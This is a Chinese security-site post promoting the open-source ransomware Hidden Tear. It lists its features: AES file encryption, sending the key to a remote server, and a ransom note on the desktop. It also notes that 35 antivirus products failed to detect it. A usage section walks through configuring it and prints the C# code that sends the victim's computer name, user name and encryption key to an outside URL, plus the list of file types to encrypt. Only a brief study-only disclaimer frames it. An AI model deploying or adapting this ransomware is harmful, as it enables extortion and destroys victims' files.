全球首款开源勒索软件–Hidden Tear

  全球首款开源勒索软件–Hidden Tear

  功能

  使用AES算法加密文件

  把加密密钥发送到某个服务器

  被加密的文件可以通过密钥和解密软件解密

  软件会在用户桌面创建一个文本文件,包含勒索信息(如:让受害者如何汇款等信息)

  特色

  软件仅有12KB

  根据2015年8月15日的扫描结果,35款杀毒软件无一款检测出病毒

  演示视频地址:

        http://v.qq.com/iframe/player.html?vid=k01622i79ol&tiny=0&auto=0

  使用方法

  你得要有一个web服务器,并且支持脚本语言,如php,python等。将此行修改成你的URL(最好使用https连接,防止窃听)

string targetURL = "http://www.utkusen.com/hidden-tear/write.php?info=";

  脚本会将GET参数写入一个文本文件中,发送的进程则是在SendPassword()函数中

string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

  你还可以修改会被加密的文件的后缀列表,默认列表为:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

  实际上这款软件有很多地方仍需改进,比如软件所使用的AES加密是对称性的加密,并不适合勒索软件,但正是由于软件是开源的,大家可以不断完善它。

  文中提及的部分技术和工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。

原文地址:https://www.77169.com/hack/201508/208329.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

相关文章

发表评论

电子邮件地址不会被公开。